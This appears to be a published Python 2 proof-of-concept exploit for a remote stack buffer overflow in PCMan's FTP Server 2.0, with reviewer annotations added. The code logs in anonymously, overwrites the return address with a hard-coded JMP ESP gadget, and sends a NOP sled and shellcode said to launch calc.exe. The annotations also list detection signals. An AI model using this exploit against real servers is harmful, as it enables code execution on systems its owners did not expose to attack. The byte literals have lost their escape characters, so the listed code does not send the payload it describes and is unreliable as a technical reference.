PCMan's FTP Server 2.0 Buffer Overflow
Posted on 28 June 2013
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
"""Proof-of-concept for a stack buffer overflow in PCMan's FTP Server 2.0.

What the script does, as written: it connects to an FTP service on
127.0.0.1:21, performs an anonymous USER/PASS login, sends one oversized
line (filler + saved-return-address overwrite + NOP sled + shellcode) on
the control channel, and disconnects.  The register dump in the header
above records the crash state the author observed: EIP is 0x41414141,
i.e. fully controlled by the filler bytes, and ESP points into the same
buffer, which is why the overwrite value is a JMP ESP address.

Defender-relevant properties visible in the code:

* The overflow is reached after an anonymous login with an arbitrary
  password; the server's replies are read but never checked.
* A control-channel line of roughly 2 KiB of repeated bytes is far outside
  normal FTP command length.  Logging or IDS rules on FTP command length
  are a cheap detection signal, and the 0x41 filler / 0x90 sled are easy
  to signature.
* The return address is hard-coded for the tested build (Windows 7 SP1
  English, USER32.DLL per the author's comment).  On a different module
  layout the overwrite presumably lands elsewhere and the most likely
  outcome is a plain crash (denial of service) rather than code execution.

Implementation notes:

* This is Python 2 code: ``socket.send`` is given ``str`` objects.  Under
  Python 3 those calls raise ``TypeError`` because bytes are required.
* NOTE(review): several literals ("x41", "xDB...", "x90", the shellcode
  body and the command terminators written as ' ') look like they lost
  escape characters during extraction.  As the text stands, the bytes put
  on the wire are the literal ASCII characters shown, not the binary
  values the header describes.
"""
import socket
import sys  # imported but unused in this script

USER = "anonymous"  # anonymous login is sufficient to reach the overflow
PASSWD = "TEST"     # arbitrary; the login reply is never inspected

# Filler that overruns the vulnerable stack buffer.  Per the author's
# layout, 2010 bytes reach the saved return address (the header dump shows
# EIP == 0x41414141 after an all-0x41 overflow).
PAYLOAD = "x41" * 2010

# Four bytes that land on the saved return address.  Per the comment this
# is a JMP ESP gadget in USER32.DLL of the tested system; it is
# build-specific and not portable.
EIP = "xDBxFCx1Cx75"  # 751CFCDB JMP ESP USER32.DLL

# Short NOP sled between the gadget's landing point (ESP) and the shellcode.
NOP = "x90" * 10

# OPENS a calc.exe UP
# Opaque byte string supplied by the author; its behaviour cannot be
# verified from this listing beyond the comment above.
SHELLCODE = (
    "xbax38xdcx15x77xddxc7xd9x74x24xf4x5dx33xc9"
    "xb1x33x83xc5x04x31x55x0ex03x6dxd2xf7x82x71"
    "x02x7ex6cx89xd3xe1xe4x6cxe2x33x92xe5x57x84"
    "xd0xabx5bx6fxb4x5fxefx1dx11x50x58xabx47x5f"
    "x59x1dx48x33x99x3fx34x49xcex9fx05x82x03xe1"
    "x42xfexecxb3x1bx75x5ex24x2fxcbx63x45xffx40"
    "xdbx3dx7ax96xa8xf7x85xc6x01x83xcexfex2axcb"
    "xeexffxffx0fxd2xb6x74xfbxa0x49x5dx35x48x78"
    "xa1x9ax77xb5x2cxe2xb0x71xcfx91xcax82x72xa2"
    "x08xf9xa8x27x8dx59x3ax9fx75x58xefx46xfdx56"
    "x44x0cx59x7ax5bxc1xd1x86xd0xe4x35x0fxa2xc2"
    "x91x54x70x6ax83x30xd7x93xd3x9cx88x31x9fx0e"
    "xdcx40xc2x44x23xc0x78x21x23xdax82x01x4cxeb"
    "x09xcex0bxf4xdbxabxe4xbex46x9dx6cx67x13x9c"
    "xf0x98xc9xe2x0cx1bxf8x9axeax03x89x9fxb7x83"
    "x61xedxa8x61x86x42xc8xa3xe5x05x5ax2fxc4xa0"
    "xdaxcax18");

# Banner (sic: "Rrmote" is a typo in the original).
print(" [+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako ")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Hard-coded loopback target: the script is written for a local test box.
s.connect(("127.0.0.1",21))
data = s.recv(1024)  # server banner; read but never inspected

print("[-] Login to FTP Server... ")
# FTP commands are CRLF-terminated; the ' ' literal here is presumably the
# terminator with its escape characters lost in extraction.
s.send("USER " + USER + ' ')
data = s.recv(1024)  # reply not checked
s.send("PASS " + PASSWD + ' ')
data = s.recv(1024)  # reply not checked: the payload is sent even if login failed

print("[-] Sending exploit... 
")
# One oversized line: filler, return-address overwrite, sled, shellcode.
# socket.send may transmit fewer bytes than requested; its return value is
# ignored here, so a short send would go unnoticed.
s.send(PAYLOAD + EIP + NOP +SHELLCODE +' ')
s.close()
# "Successfully sent" only means the socket call returned; nothing confirms
# that the server was affected.
print("[!] Done! Exploit successfully sent ")
